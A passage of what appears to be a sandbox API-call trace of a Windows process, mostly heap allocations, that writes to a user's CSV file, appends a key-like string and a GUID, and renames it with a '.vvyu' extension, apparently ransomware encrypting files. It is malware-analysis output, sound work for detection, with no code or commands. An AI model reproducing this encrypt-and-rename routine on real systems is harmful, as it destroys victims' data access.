hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.171] GetCurrentThreadId () returned 0x264 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d382a8 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.172] GetCurrentThreadId () returned 0x264 [0188.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0188.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39868 [0188.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0188.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398c8 [0188.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398e0 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39880 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27cc0 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39850 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0188.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0188.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.181] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xb15e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xb15e, lpOverlapped=0x0) returned 1 [0188.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.182] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb163, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.182] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.183] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.183] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.183] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.183] CloseHandle (hObject=0x584) returned 1 [0188.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0188.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.185] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\rgwTa9twwGw5.csv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\rgwta9twwgw5.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\rgwTa9twwGw5.csv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\rgwta9twwgw5.csv.vvyu")) returned 1 [0188.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.187] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.190] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ce4850, ftCreationTime.dwHighDateTime=0x1d896e4, ftLastAccessTime.dwLowDateTime=0xe8751e50, ftLastAccessTime.dwHighDateTime=0x1d89f96, ftLastWriteTime.dwLowDateTime=0xe8751e50, ftLastWriteTime.dwHighDateTime=0x1d89f96, nFileSizeHigh=0x0, nFileSizeLow=0xb163, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rgwTa9twwGw5.csv", cAlternateFileName="RGWTA9~1.CSV")) returned 0 [0188.190] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0188.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.191] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.191] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.206] RtlAllocateHeap 